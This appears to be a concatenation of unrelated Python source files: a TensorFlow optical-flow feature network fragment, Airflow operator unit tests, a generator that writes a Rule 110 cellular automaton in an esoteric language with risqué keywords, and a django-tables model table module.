.conv(1, 1, feature_len, 1, 1, name='2x_skip_cov_1', c_i=128, relu=False, reuse=reuse)
.add_immediate(tf.constant(0.0, tf.float32), name='skip_link_2x_r'))
(self.feed('upscale_4x_r', 'skip_link_2x_r')
.add(name='2_add')
.add_immediate(tf.constant(0.0, tf.float32), name='features_2x_r')
.conv(3, 3, feature_len, 1, 1, name='2x_conv_2', relu=False, reuse=reuse)
.deconv(4, 4, feature_len, 2, 2, name='upscale_2x_r', trainable=False))
# # 1x scaling input
# (self.feed('conv1_r')
# .conv(1, 1, feature_len, 1, 1, name='1x_skip_cov_1', c_i=64, relu=False, reuse=reuse)
# .add_immediate(tf.constant(0.0, tf.float32), name='skip_link_1x_r'))
# (self.feed('upscale_2x_r', 'skip_link_1x_r')
# .add(name='1_add')
# .add_immediate(tf.constant(0.0, tf.float32), name='features_1x_r'))
self.feed('upscale_2x_l')
self.add_immediate(tf.constant(0.0, tf.float32), name='features_1x_l')
self.feed('upscale_2x_r')
self.add_immediate(tf.constant(0.0, tf.float32), name='features_1x_r')
with tf.device("/cpu:0"):
# triplet loss
# (self.feed(['features_1x_l', 'features_1x_r', 'gt_flow', 'occluded', 'left_labels', 'right_labels'])
# .triplet_flow_loss(margin=1.0, negative_radius=2, positive_radius=1, name="triplet_loss_1x"))
(self.feed(['features_2x_l', 'features_2x_r', 'gt_flow_2x', 'occluded_2x', 'left_labels_2x', 'right_labels_2x'])
.triplet_flow_loss(margin=1.0, negative_radius=2, positive_radius=1, name="triplet_loss_2x"))
# (self.feed(['features_4x_l', 'features_4x_r', 'gt_flow_4x', 'occluded_4x', 'left_labels_4x', 'right_labels_4x'])
# .triplet_flow_loss(margin=1.0, negative_radius=4, positive_radius=2, name="triplet_loss_4x"))
#
# (self.feed(['features_8x_l', 'features_8x_r', 'gt_flow_8x', 'occluded_8x', 'left_labels_8x', 'right_labels_8x'])
# .triplet_flow_loss(margin=1.0, negative_radius=5, positive_radius=2, name="triplet_loss_8x"))
#
# final_output = (self.get_output('triplet_loss_8x')[0] + self.get_output('triplet_loss_2x')[0] +
# self.get_output('triplet_loss_4x')[0] + self.get_output('triplet_loss_1x')[0]) / 4.0
final_output = self.get_output('triplet_loss_2x')[0]
self.layers["final_triplet_loss"] = [final_output]
# (self.feed(['features_8x_l', 'features4x_l', 'features_2x_l', 'features_1x_l'])
# .concat(axis=3, name="final_features_l_out"))
#
# (self.feed(['features_8x_r', 'features4x_r', 'features_2x_r', 'features_1x_r'])
# .concat(axis=3, name="final_features_r_out"))
pass
| |
# -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from __future__ import print_function, unicode_literals
import copy
import logging
import os
import unittest
from datetime import timedelta
from airflow import configuration
from airflow.exceptions import AirflowException
from airflow.models import TaskInstance as TI, DAG, DagRun
from airflow.operators.dummy_operator import DummyOperator
from airflow.operators.python_operator import PythonOperator, BranchPythonOperator
from airflow.operators.python_operator import ShortCircuitOperator
from airflow.utils import timezone
from airflow.utils.db import create_session
from airflow.utils.state import State
# Fixed, timezone-aware dates shared by every test in this module.
DEFAULT_DATE = timezone.datetime(2016, 1, 1)
END_DATE = timezone.datetime(2016, 1, 2)
INTERVAL = timedelta(hours=12)
# Stable stand-in for "now" where a test needs a fixed current time.
FROZEN_NOW = timezone.datetime(2016, 1, 2, 12, 1, 1)
# Context variables exported to os.environ when a PythonOperator runs;
# tearDown deletes them so one test cannot leak context into the next.
TI_CONTEXT_ENV_VARS = ['AIRFLOW_CTX_DAG_ID',
                       'AIRFLOW_CTX_TASK_ID',
                       'AIRFLOW_CTX_EXECUTION_DATE',
                       'AIRFLOW_CTX_DAG_RUN_ID']
class PythonOperatorTest(unittest.TestCase):
    """Tests for PythonOperator: callable invocation, argument validation,
    shallow copying, and context env-var export."""

    @classmethod
    def setUpClass(cls):
        super(PythonOperatorTest, cls).setUpClass()
        # Start from a clean metadata DB so assertions only see rows
        # created by this class.
        with create_session() as session:
            session.query(DagRun).delete()
            session.query(TI).delete()

    def setUp(self):
        super(PythonOperatorTest, self).setUp()
        configuration.load_test_config()
        self.dag = DAG(
            'test_dag',
            default_args={
                'owner': 'airflow',
                'start_date': DEFAULT_DATE},
            schedule_interval=INTERVAL)
        self.addCleanup(self.dag.clear)
        self.clear_run()
        self.addCleanup(self.clear_run)

    def tearDown(self):
        super(PythonOperatorTest, self).tearDown()
        with create_session() as session:
            session.query(DagRun).delete()
            session.query(TI).delete()
        # Remove any context variables the operator exported so later
        # tests observe a clean environment.
        for var in TI_CONTEXT_ENV_VARS:
            if var in os.environ:
                del os.environ[var]

    def do_run(self):
        """Callback used as python_callable; records that it was invoked."""
        # Fix: use a dedicated flag attribute instead of `self.run`, which
        # shadowed unittest.TestCase.run() once assigned.
        self.run_invoked = True

    def clear_run(self):
        """Reset the invocation flag."""
        self.run_invoked = False

    def is_run(self):
        """Return True if do_run() has been invoked since the last reset."""
        return self.run_invoked

    def test_python_operator_run(self):
        """Tests that the python callable is invoked on task run."""
        task = PythonOperator(
            python_callable=self.do_run,
            task_id='python_operator',
            dag=self.dag)
        self.assertFalse(self.is_run())
        task.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE)
        self.assertTrue(self.is_run())

    def test_python_operator_python_callable_is_callable(self):
        """Tests that PythonOperator will only instantiate if
        the python_callable argument is callable."""
        not_callable = {}
        with self.assertRaises(AirflowException):
            PythonOperator(
                python_callable=not_callable,
                task_id='python_operator',
                dag=self.dag)
        not_callable = None
        with self.assertRaises(AirflowException):
            PythonOperator(
                python_callable=not_callable,
                task_id='python_operator',
                dag=self.dag)

    def test_python_operator_shallow_copy_attr(self):
        """Deep-copying the operator must NOT deep-copy python_callable or
        op_kwargs (they are declared shallow-copied attributes)."""
        # Fix: the original named this callable `not_callable`, which was
        # misleading — it IS callable (a lambda); only the name changed.
        identity_callable = lambda x: x
        original_task = PythonOperator(
            python_callable=identity_callable,
            task_id='python_operator',
            op_kwargs={'certain_attrs': ''},
            dag=self.dag
        )
        new_task = copy.deepcopy(original_task)
        # shallow copy op_kwargs
        self.assertEqual(id(original_task.op_kwargs['certain_attrs']),
                         id(new_task.op_kwargs['certain_attrs']))
        # shallow copy python_callable
        self.assertEqual(id(original_task.python_callable),
                         id(new_task.python_callable))

    def _env_var_check_callback(self):
        """Assert the operator exported the expected context env vars."""
        self.assertEqual('test_dag', os.environ['AIRFLOW_CTX_DAG_ID'])
        self.assertEqual('hive_in_python_op', os.environ['AIRFLOW_CTX_TASK_ID'])
        self.assertEqual(DEFAULT_DATE.isoformat(),
                         os.environ['AIRFLOW_CTX_EXECUTION_DATE'])
        self.assertEqual('manual__' + DEFAULT_DATE.isoformat(),
                         os.environ['AIRFLOW_CTX_DAG_RUN_ID'])

    def test_echo_env_variables(self):
        """
        Test that env variables are exported correctly to the
        python callback in the task.
        """
        self.dag.create_dagrun(
            run_id='manual__' + DEFAULT_DATE.isoformat(),
            execution_date=DEFAULT_DATE,
            start_date=DEFAULT_DATE,
            state=State.RUNNING,
            external_trigger=False,
        )
        t = PythonOperator(task_id='hive_in_python_op',
                           dag=self.dag,
                           python_callable=self._env_var_check_callback
                           )
        t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE)
class BranchOperatorTest(unittest.TestCase):
    """Tests for BranchPythonOperator: selected branch(es) stay runnable,
    unselected branches are skipped."""

    @classmethod
    def setUpClass(cls):
        super(BranchOperatorTest, cls).setUpClass()
        # Purge leftover DagRun/TaskInstance rows from other test modules.
        with create_session() as session:
            session.query(DagRun).delete()
            session.query(TI).delete()

    def setUp(self):
        # Fix: call through to TestCase.setUp(), for parity with the other
        # test classes in this module (previously omitted).
        super(BranchOperatorTest, self).setUp()
        self.dag = DAG('branch_operator_test',
                       default_args={
                           'owner': 'airflow',
                           'start_date': DEFAULT_DATE},
                       schedule_interval=INTERVAL)
        self.branch_1 = DummyOperator(task_id='branch_1', dag=self.dag)
        self.branch_2 = DummyOperator(task_id='branch_2', dag=self.dag)

    def tearDown(self):
        super(BranchOperatorTest, self).tearDown()
        with create_session() as session:
            session.query(DagRun).delete()
            session.query(TI).delete()

    def test_without_dag_run(self):
        """This checks the defensive handling of task instances when no
        DagRun exists."""
        self.branch_op = BranchPythonOperator(task_id='make_choice',
                                              dag=self.dag,
                                              python_callable=lambda: 'branch_1')
        self.branch_1.set_upstream(self.branch_op)
        self.branch_2.set_upstream(self.branch_op)
        self.dag.clear()
        self.branch_op.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE)
        with create_session() as session:
            tis = session.query(TI).filter(
                TI.dag_id == self.dag.dag_id,
                TI.execution_date == DEFAULT_DATE
            )
            for ti in tis:
                if ti.task_id == 'make_choice':
                    self.assertEqual(ti.state, State.SUCCESS)
                elif ti.task_id == 'branch_1':
                    # should exist with state None
                    self.assertEqual(ti.state, State.NONE)
                elif ti.task_id == 'branch_2':
                    self.assertEqual(ti.state, State.SKIPPED)
                else:
                    # Fix: message the bare Exception for diagnosability.
                    raise Exception('unexpected task_id: %s' % ti.task_id)

    def test_branch_list_without_dag_run(self):
        """This checks if the BranchPythonOperator supports branching off
        to a list of tasks."""
        self.branch_op = BranchPythonOperator(task_id='make_choice',
                                              dag=self.dag,
                                              python_callable=lambda: ['branch_1', 'branch_2'])
        self.branch_1.set_upstream(self.branch_op)
        self.branch_2.set_upstream(self.branch_op)
        self.branch_3 = DummyOperator(task_id='branch_3', dag=self.dag)
        self.branch_3.set_upstream(self.branch_op)
        self.dag.clear()
        self.branch_op.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE)
        with create_session() as session:
            tis = session.query(TI).filter(
                TI.dag_id == self.dag.dag_id,
                TI.execution_date == DEFAULT_DATE
            )
            # Both listed branches stay runnable; only branch_3 is skipped.
            expected = {
                "make_choice": State.SUCCESS,
                "branch_1": State.NONE,
                "branch_2": State.NONE,
                "branch_3": State.SKIPPED,
            }
            for ti in tis:
                if ti.task_id in expected:
                    self.assertEqual(ti.state, expected[ti.task_id])
                else:
                    raise Exception('unexpected task_id: %s' % ti.task_id)

    def test_with_dag_run(self):
        """Selected branch stays runnable and the other is skipped when an
        actual DagRun exists."""
        self.branch_op = BranchPythonOperator(task_id='make_choice',
                                              dag=self.dag,
                                              python_callable=lambda: 'branch_1')
        self.branch_1.set_upstream(self.branch_op)
        self.branch_2.set_upstream(self.branch_op)
        self.dag.clear()
        dr = self.dag.create_dagrun(
            run_id="manual__",
            start_date=timezone.utcnow(),
            execution_date=DEFAULT_DATE,
            state=State.RUNNING
        )
        self.branch_op.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE)
        tis = dr.get_task_instances()
        for ti in tis:
            if ti.task_id == 'make_choice':
                self.assertEqual(ti.state, State.SUCCESS)
            elif ti.task_id == 'branch_1':
                self.assertEqual(ti.state, State.NONE)
            elif ti.task_id == 'branch_2':
                self.assertEqual(ti.state, State.SKIPPED)
            else:
                raise Exception('unexpected task_id: %s' % ti.task_id)

    def test_with_skip_in_branch_downstream_dependencies(self):
        """branch_2 is reachable both via branch_1 and directly from the
        branch operator (a diamond); choosing branch_1 must leave branch_2
        runnable."""
        self.branch_op = BranchPythonOperator(task_id='make_choice',
                                              dag=self.dag,
                                              python_callable=lambda: 'branch_1')
        self.branch_op >> self.branch_1 >> self.branch_2
        self.branch_op >> self.branch_2
        self.dag.clear()
        dr = self.dag.create_dagrun(
            run_id="manual__",
            start_date=timezone.utcnow(),
            execution_date=DEFAULT_DATE,
            state=State.RUNNING
        )
        self.branch_op.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE)
        tis = dr.get_task_instances()
        for ti in tis:
            if ti.task_id == 'make_choice':
                self.assertEqual(ti.state, State.SUCCESS)
            elif ti.task_id == 'branch_1':
                self.assertEqual(ti.state, State.NONE)
            elif ti.task_id == 'branch_2':
                self.assertEqual(ti.state, State.NONE)
            else:
                raise Exception('unexpected task_id: %s' % ti.task_id)

    def test_with_skip_in_branch_downstream_dependencies2(self):
        """Same diamond as above, but choosing branch_2: branch_1 is
        skipped while branch_2 (directly selected) stays runnable."""
        self.branch_op = BranchPythonOperator(task_id='make_choice',
                                              dag=self.dag,
                                              python_callable=lambda: 'branch_2')
        self.branch_op >> self.branch_1 >> self.branch_2
        self.branch_op >> self.branch_2
        self.dag.clear()
        dr = self.dag.create_dagrun(
            run_id="manual__",
            start_date=timezone.utcnow(),
            execution_date=DEFAULT_DATE,
            state=State.RUNNING
        )
        self.branch_op.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE)
        tis = dr.get_task_instances()
        for ti in tis:
            if ti.task_id == 'make_choice':
                self.assertEqual(ti.state, State.SUCCESS)
            elif ti.task_id == 'branch_1':
                self.assertEqual(ti.state, State.SKIPPED)
            elif ti.task_id == 'branch_2':
                self.assertEqual(ti.state, State.NONE)
            else:
                raise Exception('unexpected task_id: %s' % ti.task_id)
class ShortCircuitOperatorTest(unittest.TestCase):
    """Tests for ShortCircuitOperator: a falsy callable skips all
    downstream tasks; a truthy one leaves them runnable."""
    @classmethod
    def setUpClass(cls):
        super(ShortCircuitOperatorTest, cls).setUpClass()
        # Purge leftover DagRun/TaskInstance rows from other test modules.
        with create_session() as session:
            session.query(DagRun).delete()
            session.query(TI).delete()
    def tearDown(self):
        super(ShortCircuitOperatorTest, self).tearDown()
        with create_session() as session:
            session.query(DagRun).delete()
            session.query(TI).delete()
    def test_without_dag_run(self):
        """Defensive handling of task instances when no DagRun exists."""
        # `value` is captured by the lambda below, so flipping it later
        # changes the operator's outcome on the second run.
        value = False
        dag = DAG('shortcircuit_operator_test_without_dag_run',
                  default_args={
                      'owner': 'airflow',
                      'start_date': DEFAULT_DATE
                  },
                  schedule_interval=INTERVAL)
        short_op = ShortCircuitOperator(task_id='make_choice',
                                        dag=dag,
                                        python_callable=lambda: value)
        branch_1 = DummyOperator(task_id='branch_1', dag=dag)
        branch_1.set_upstream(short_op)
        branch_2 = DummyOperator(task_id='branch_2', dag=dag)
        branch_2.set_upstream(branch_1)
        upstream = DummyOperator(task_id='upstream', dag=dag)
        upstream.set_downstream(short_op)
        dag.clear()
        short_op.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE)
        with create_session() as session:
            tis = session.query(TI).filter(
                TI.dag_id == dag.dag_id,
                TI.execution_date == DEFAULT_DATE
            )
            for ti in tis:
                if ti.task_id == 'make_choice':
                    self.assertEqual(ti.state, State.SUCCESS)
                elif ti.task_id == 'upstream':
                    # should not exist
                    raise Exception
                elif ti.task_id == 'branch_1' or ti.task_id == 'branch_2':
                    self.assertEqual(ti.state, State.SKIPPED)
                else:
                    raise Exception
            # Truthy callable: downstream tasks must no longer be skipped.
            value = True
            dag.clear()
            short_op.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE)
            # NOTE(review): `tis` appears to be a lazy query re-iterated
            # here to observe the post-clear states — confirm this holds
            # for the session/query implementation in use.
            for ti in tis:
                if ti.task_id == 'make_choice':
                    self.assertEqual(ti.state, State.SUCCESS)
                elif ti.task_id == 'upstream':
                    # should not exist
                    raise Exception
                elif ti.task_id == 'branch_1' or ti.task_id == 'branch_2':
                    self.assertEqual(ti.state, State.NONE)
                else:
                    raise Exception
    def test_with_dag_run(self):
        """Same short-circuit behaviour, but with a real DagRun so the
        upstream task instance exists too."""
        value = False
        dag = DAG('shortcircuit_operator_test_with_dag_run',
                  default_args={
                      'owner': 'airflow',
                      'start_date': DEFAULT_DATE
                  },
                  schedule_interval=INTERVAL)
        short_op = ShortCircuitOperator(task_id='make_choice',
                                        dag=dag,
                                        python_callable=lambda: value)
        branch_1 = DummyOperator(task_id='branch_1', dag=dag)
        branch_1.set_upstream(short_op)
        branch_2 = DummyOperator(task_id='branch_2', dag=dag)
        branch_2.set_upstream(branch_1)
        upstream = DummyOperator(task_id='upstream', dag=dag)
        upstream.set_downstream(short_op)
        dag.clear()
        logging.error("Tasks {}".format(dag.tasks))
        dr = dag.create_dagrun(
            run_id="manual__",
            start_date=timezone.utcnow(),
            execution_date=DEFAULT_DATE,
            state=State.RUNNING
        )
        upstream.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE)
        short_op.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE)
        tis = dr.get_task_instances()
        self.assertEqual(len(tis), 4)
        for ti in tis:
            if ti.task_id == 'make_choice':
                self.assertEqual(ti.state, State.SUCCESS)
            elif ti.task_id == 'upstream':
                self.assertEqual(ti.state, State.SUCCESS)
            elif ti.task_id == 'branch_1' or ti.task_id == 'branch_2':
                self.assertEqual(ti.state, State.SKIPPED)
            else:
                raise Exception
        # Second pass with a truthy callable: nothing gets skipped.
        value = True
        dag.clear()
        dr.verify_integrity()
        upstream.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE)
        short_op.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE)
        tis = dr.get_task_instances()
        self.assertEqual(len(tis), 4)
        for ti in tis:
            if ti.task_id == 'make_choice':
                self.assertEqual(ti.state, State.SUCCESS)
            elif ti.task_id == 'upstream':
                self.assertEqual(ti.state, State.SUCCESS)
            elif ti.task_id == 'branch_1' or ti.task_id == 'branch_2':
                self.assertEqual(ti.state, State.NONE)
            else:
                raise Exception
| |
### ARGS ###
# Number of generations of the cellular automaton to emit.
iterations = 40;
# Width of the tape in characters, including the '#' borders.
gridWidth = 40;
## Vars ##
# Current indentation depth of the emitted code.
indentLevel = 0;
# Output stream for the generated program.
# NOTE(review): the name shadows the Python 2 builtin `file`.
file = open("110-generated.fet", "w")
def indent():
    """Increase the emitted-code indentation by one level."""
    global indentLevel
    indentLevel += 1
def unindent():
    """Decrease the emitted-code indentation by one level."""
    global indentLevel
    indentLevel -= 1
def newline():
    """Emit an empty line."""
    printCode("")
def printCode(code):
    """Write one line of generated code at the current indentation."""
    file.write("%s%s\n" % ("\t" * indentLevel, code))
## These things are constant for any size
def generateIntro():
    """Emit the constant prelude: the initial tape and helper variables."""
    # Laura: scratch string for the next generation; Julia: current tape,
    # '#'-bordered with a single '1' at the right edge.
    printCode( 'Make Laura moan' )
    printCode( 'Make Julia moan "#' + "0" * (gridWidth-3) + '1#"' )
    newline()
    printCode( 'Make startString moan "#0"' )
    printCode( 'Make endString moan "0#"' )
    newline()
    # ASCII codes of the tape characters: '0'=48, '1'=49, '#'=35.
    printCode( 'Lick AsciiZero forty eight times' )
    printCode( 'Lick AsciiOne forty nine times' )
    printCode( 'Lick AsciiOcto\'s thigh thirty five times' )
    newline()
    printCode ( "Worship Counter" )
    printCode ( "Worship iterations" )
    newline()
    # Scratch cells holding the 3-char neighborhood of the current cell.
    printCode( "Worship left" )
    printCode( "Worship middle" )
    printCode( "Worship right" )
    newline()
    newline()
    newline()
## A better solution would write the string literal for the number, but this is generated code, so allow my laziness.
def generateNumbers():
    """Emit numberK constants; numberK is licked K times so it holds K."""
    printCode("Worship number0")
    upper = max(gridWidth - 1, iterations) + 1
    for value in range(1, upper):
        name = "number%d" % value
        for _ in range(value):
            printCode("lick " + name)
    newline()
    newline()
def beginLoop():
    """Open the main generation loop over `iterations` steps."""
    printCode("while iterations is submissive to Number%d" % iterations)
    indent()
    newline()
    newline()
def setEmptyPositions():
    """Emit code resetting all current/next cell variables to empty."""
    for cell in range(2, gridWidth - 2):
        suffix = str(cell)
        printCode("make position" + suffix + " moan")
        printCode("make nextposition" + suffix + " moan")
    newline()
    newline()
def resetTempVariables():
    """Emit code zeroing the scratch variables used per cell."""
    for line in ("Have left spank left",
                 "Have middle spank middle",
                 "Have right spank right",
                 "Have counter spank counter",
                 "Make Laura moan"):
        printCode(line)
    newline()
def incrementLoopCounter():
    """Emit code advancing the generation counter by one."""
    printCode( "lick iterations" )
    newline()
def printCurrentState():
    """Emit code printing the current tape (Julia)."""
    printCode( "Make Slave Scream Julia" )
    newline()
def generateParentString(pos):
    """Emit the window test appending the chars with index in
    (pos-2, pos+2) onto position<pos>."""
    printCode("If counter is submissive to number%d" % (pos + 2))
    indent()
    printCode("If counter is dominant towards number%d" % (pos - 2))
    indent()
    printCode("Have Emma hogtie position%d" % pos)
    unindent()
    unindent()
    newline()
#This function is the main trick to running the 110.
#For each cell, we create a string that contains three chars:
#The ones relevant to it's activation.
def getParentStrings():
    """For every cell, collect its 3-char neighborhood from the tape.

    Walks the current tape (Julia) once, skipping the '#' borders, and
    for each interior cell appends the relevant characters to that
    cell's position variable.
    """
    printCode("Bind Emma to Julia")
    indent()
    printCode("If Emma is not AsciiOcto")
    indent()
    for cell in range(2, gridWidth - 2):
        generateParentString(cell)
    unindent()
    printCode("lick counter")
    unindent()
    newline()
    newline()
    newline()
def getDescendants():
    """Emit the next-state computation for every interior cell."""
    for cell in range(2, gridWidth - 2):
        getDescendant(cell)
    newline()
    newline()
    newline()
def getDescendant( pos ):
    """Emit code computing cell <pos>'s next state from position<pos>.

    First pass: walk the 3-char neighborhood string, copying its chars
    into left/middle/right (counter selects the slot).  Second pass:
    apply the Rule 110 table to (left, middle, right) and hogtie the
    result ('0' or '1') onto nextposition<pos>.
    """
    # Reset scratch state before scanning this cell's neighborhood.
    printCode( "Have counter spank counter" )
    printCode( "Have left spank left" )
    printCode( "Have middle spank middle" )
    printCode( "Have right spank right" )
    newline()
    newline()
    printCode( "Bind Emma to position" + str( pos ) )
    indent()
    printCode( "if counter is number0" )
    indent()
    printCode( "If Emma is AsciiZero" )
    indent()
    printCode( "Have AsciiZero lick left" )
    unindent()
    printCode( "Otherwise" )
    indent()
    printCode( "Have AsciiOne lick left" )
    unindent()
    unindent()
    printCode( "if counter is number1" )
    indent()
    printCode( "If Emma is AsciiZero" )
    indent()
    printCode( "Have AsciiZero lick middle" )
    unindent()
    printCode( "Otherwise" )
    indent()
    printCode( "Have AsciiOne lick middle" )
    unindent()
    unindent()
    printCode( "if counter is number2" )
    indent()
    printCode( "If Emma is AsciiZero" )
    indent()
    printCode( "Have AsciiZero lick right" )
    unindent()
    printCode( "Otherwise" )
    indent()
    printCode( "Have AsciiOne lick right" )
    unindent()
    unindent()
    printCode( "Lick counter" )
    unindent()
    newline()
    newline()
    # Rule 110 truth table on (left, middle, right):
    # 111->0, 110->1, 101->1, 100->0, 011->1, 010->1, 001->1, 000->0.
    printCode( "if left is AsciiOne" )
    indent()
    printCode( "if middle is AsciiOne" )
    indent()
    printCode( "if right is AsciiZero" )
    indent()
    printCode( "Have AsciiOne hogtie nextposition" + str( pos ) )
    unindent()
    printCode( "otherwise" )
    indent()
    printCode( "have AsciiZero hogtie nextposition" + str( pos ) )
    unindent()
    unindent()
    printCode( "if middle is AsciiZero" )
    indent()
    printCode( "if right is AsciiOne" )
    indent()
    printCode( "have AsciiOne hogtie nextposition" + str( pos ) )
    unindent()
    printCode( "otherwise" )
    indent()
    printCode( "have AsciiZero hogtie nextposition" + str( pos ) )
    unindent()
    unindent()
    unindent()
    printCode( "if left is AsciiZero" )
    indent()
    printCode( "if middle is AsciiOne" )
    indent()
    printCode( "Have AsciiOne hogtie nextposition" + str( pos ) )
    unindent()
    printCode( "otherwise" )
    indent()
    printCode( "if right is AsciiOne" )
    indent()
    printCode( "Have AsciiOne hogtie nextposition" + str( pos ) )
    unindent()
    printCode( "otherwise" )
    indent()
    printCode( "have AsciiZero hogtie nextposition" + str( pos ) )
    unindent()
    unindent()
    unindent()
    newline()
    newline()
    newline()
def writeNextGeneration():
    """Emit code rebuilding Laura as '#0' + next cells + '0#'."""
    printCode('make Laura moan "#0"')
    for cell in range(2, gridWidth - 2):
        writeNextGenerationPosition(cell)
    printCode("have AsciiZero hogtie Laura")
    printCode("have AsciiOcto hogtie Laura")
    newline()
    newline()
    newline()
def writeNextGenerationPosition(pos):
    """Emit code appending cell <pos>'s next value ('0' or '1') to Laura."""
    printCode("bind Emma to nextposition%d" % pos)
    indent()
    printCode("if Emma is AsciiZero")
    indent()
    printCode("have AsciiZero hogtie Laura")
    unindent()
    printCode("otherwise")
    indent()
    printCode("have AsciiOne hogtie Laura")
    unindent()
    unindent()
def saveNextGeneration():
    """Emit code copying Laura (next tape) back into Julia (current tape)."""
    printCode( "Make Julia moan" )
    printCode( "bind Emma to Laura" )
    indent()
    printCode( "have Emma hogtie Julia" )
    # NOTE(review): no matching unindent(); indentLevel stays raised after
    # this call — harmless since nothing further is emitted, but verify.
def main():
    """Drive the full code-generation pipeline, in emission order.

    Note: beginLoop() opens the generation loop but no explicit closer is
    emitted — presumably the target language closes blocks at EOF; confirm.
    """
    generateIntro()
    generateNumbers()
    beginLoop()
    resetTempVariables()
    setEmptyPositions()
    incrementLoopCounter()
    printCurrentState()
    getParentStrings()
    getDescendants()
    writeNextGeneration()
    saveNextGeneration()
main()
| |
from django.core.exceptions import FieldError
from django.utils.datastructures import SortedDict
from tables import BaseTable, DeclarativeColumnsMetaclass, \
Column, BoundRow, Rows, TableOptions, rmprefix, toggleprefix
__all__ = ('BaseModelTable', 'ModelTable')
class ModelTableOptions(TableOptions):
    """Table options extended with the ModelTable-specific settings
    ``model``, ``columns`` and ``exclude``, read from the inner Meta."""
    def __init__(self, options=None):
        super(ModelTableOptions, self).__init__()
        # Each setting defaults to None when absent from the Meta object.
        for attr in ('model', 'columns', 'exclude'):
            setattr(self, attr, getattr(options, attr, None))
def columns_for_model(model, columns=None, exclude=None):
    """
    Returns a ``SortedDict`` containing form columns for the given model.

    ``columns`` is an optional list of field names. If provided, only the
    named model fields will be included in the returned column list.

    ``exclude`` is an optional list of field names. If provided, the named
    model fields will be excluded from the returned list of columns, even
    if they are listed in the ``fields`` argument.
    """
    field_list = []
    opts = model._meta
    # Walk regular and many-to-many fields in declaration order.
    for f in opts.fields + opts.many_to_many:
        # Fix: idiomatic `not in` membership test (was `not f.name in`).
        if (columns and f.name not in columns) or \
           (exclude and f.name in exclude):
            continue
        column = Column()  # TODO: choose correct column type, with right options
        if column:
            field_list.append((f.name, column))
    return SortedDict(field_list)
class ModelTableMetaclass(DeclarativeColumnsMetaclass):
    """Metaclass that merges model-derived default columns with the
    columns explicitly declared on the table class."""
    def __new__(cls, name, bases, attrs):
        # Let the default form meta class get the declared columns; store
        # those in a separate attribute so that ModelTable inheritance with
        # differing models works as expected (the behaviour known from
        # ModelForms).
        self = super(ModelTableMetaclass, cls).__new__(
            cls, name, bases, attrs, parent_cols_from='declared_columns')
        self.declared_columns = self.base_columns
        # Parse the inner Meta (model/columns/exclude) into _meta.
        opts = self._meta = ModelTableOptions(getattr(self, 'Meta', None))
        # if a model is defined, then build a list of default columns and
        # let the declared columns override them.
        if opts.model:
            columns = columns_for_model(opts.model, opts.columns, opts.exclude)
            columns.update(self.declared_columns)
            self.base_columns = columns
        return self
class BaseModelTable(BaseTable):
    """Table that is based on a model.

    Similar to ModelForm, a column will automatically be created for all
    the model's fields. You can modify this behaviour with an inner Meta
    class:

        class MyTable(ModelTable):
            class Meta:
                model = MyModel
                exclude = ['fields', 'to', 'exclude']
                fields = ['fields', 'to', 'include']

    One difference to a normal table is the initial data argument. It can
    be a queryset or a model (its default manager will be used). If you
    don't pass any data at all, the model the table is based on will
    provide it.
    """
    def __init__(self, data=None, *args, **kwargs):
        # Use an identity test (was ``data == None``): equality would invoke
        # the argument's __eq__, which is both slower and potentially wrong
        # for queryset-like objects.
        if data is None:
            if self._meta.model is None:
                raise ValueError('Table without a model association needs '
                    'to be initialized with data')
            self.queryset = self._meta.model._default_manager.all()
        elif hasattr(data, '_default_manager'):  # saves us db.models import
            self.queryset = data._default_manager.all()
        else:
            self.queryset = data
        super(BaseModelTable, self).__init__(self.queryset, *args, **kwargs)
        self._rows = ModelRows(self)

    def _validate_column_name(self, name, purpose):
        """Overridden. Only allow model-based fields and valid model
        spanning relationships to be sorted."""
        # let the base class sort out the easy ones
        result = super(BaseModelTable, self)._validate_column_name(name, purpose)
        if not result:
            return False
        if purpose == 'order_by':
            column = self.columns[name]
            # "data" can really be used in two different ways. It is
            # slightly confusing and potentially should be changed.
            # It can either refer to an attribute/field which the table
            # column should represent, or can be a callable (or a string
            # pointing to a callable attribute) that is used to render the
            # cell. The difference is that in the latter case, there may
            # still be an actual source model field behind the column,
            # stored in "declared_name". In other words, we want to filter
            # out column names that are not orderable, and the column name
            # we need to check may either be stored in "data" or in
            # "declared_name", depending on if and what kind of value is
            # in "data". This is the reason why we try twice.
            #
            # See also bug #282964.
            #
            # TODO: It might be faster to try to resolve the given name
            # manually recursing the model metadata rather than
            # constructing a queryset.
            for lookup in (column.column.data, column.declared_name):
                if not lookup or callable(lookup):
                    continue
                try:
                    # let django validate the lookup
                    _temp = self.queryset.order_by(lookup)
                    _temp.query.as_sql()
                    break
                except FieldError:
                    pass
            else:
                # neither candidate name validated against the model
                return False
        # if we haven't failed by now, the column should be valid
        return True

    def _build_snapshot(self):
        """Overridden. The snapshot in this case is simply a queryset
        with the necessary filters etc. attached.
        """
        # reset caches
        self._columns._reset()
        self._rows._reset()
        queryset = self.queryset
        if self.order_by:
            actual_order_by = self._resolve_sort_directions(self.order_by)
            queryset = queryset.order_by(*self._cols_to_fields(actual_order_by))
        self._snapshot = queryset

    def _get_rows(self):
        # wrap each model instance in a row object that understands models
        for row in self.data:
            yield BoundModelRow(self, row)
class ModelTable(BaseModelTable):
    """Concrete model-backed table; columns are built by the metaclass."""
